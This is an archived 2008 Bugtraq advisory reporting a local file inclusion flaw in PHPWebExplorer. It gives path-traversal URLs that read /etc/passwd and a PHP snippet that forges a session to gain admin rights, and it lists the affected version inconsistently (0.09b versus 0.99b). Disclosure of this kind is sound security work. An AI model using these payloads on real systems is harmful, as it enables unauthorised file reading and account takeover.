PHPWebExplorer <= 0.09b: Local File Inclusion Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx, bugtraq-owner@xxxxxxxxxxxxxxxxx
Subject: PHPWebExplorer <= 0.09b: Local File Inclusion Vulnerability
From: Pepelux <pepelux@xxxxxxxxxxxx>
Date: Sat, 4 Oct 2008 17:58:05 +0200
Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:date:from:sender :to:subject:mime-version:content-type:content-transfer-encoding :content-disposition:x-google-sender-auth; bh=M2euCDCP1xkx7gIS+F6BhF+YzhCW94ROqt59JSgxWA0=; b=lJYaUiYdnQHATB0HF9xnCnwNv/YgItFB+Q8HrL6KzdpMEQGxPn6zQlO0cVHfJJ+VXX jG87Ht0a2bxL36SIZYFgWRCNbZMW2nv7RDSQP8pL8EZL6wdF+ityTg2MobxFc9GPbOyf fhRuXUkZuM9wlw6F5sbVvdXTH3uXkcaqoIB0w=
Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=message-id:date:from:sender:to:subject:mime-version:content-type :content-transfer-encoding:content-disposition:x-google-sender-auth; b=HXoBmejX5dA9mHVUM9qT9E6OfXb+/QAfpVOIeWisS5LnHRFX84p6uqd3wYKjaaqylf 1Fn+j9YRg7o1GhMdM75CDBIDSdB/u4E+aE4MhAIeS/qF9tDfXsX6cJkD3hYyaWcAaI8l +HVASR0Ak0fRl5dE76syaCGQFkh44+qIOAza4=
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Sender: pepeluxx@xxxxxxxxx

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
PHPWebExplorer <= 0.09b: Local File Inclusion Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

$ Program: PHPWebExplorer
$ File(s) affected: main.php / edit.php
$ Version: 0.99b
$ Download: http://sourceforge.net/projects/phpwebexplorer/


Found by Pepelux <pepelux[at]enye-sec.org>
eNYe-Sec - www.enye-sec.org


-- Exploit --
If you have access to the control panel:
http://localhost/main.php?refer=d&d=../../../etc
http://localhost/edit.php?file=../../../etc/passwd

If you are not a register user but you have access to write any file to the
server (ex: a shared server where you can create an account) you can win
admin privileges creating and executing a simple PHP:

<?
session_start();
$_SESSION['logged_in']='user1';
?>

Prev by Date: RE: RE: MySQL command-line client HTML injection vulnerability
Next by Date: AyeView v2.20 (malformed gif image) DoS Exploit
Previous by thread: VMSA-2008-0016 VMware Hosted products, VirtualCenter Update 3 and patches for ESX and ESXi resolve multiple security issues
Next by thread: AyeView v2.20 (malformed gif image) DoS Exploit
Index(es):
- Date
- Thread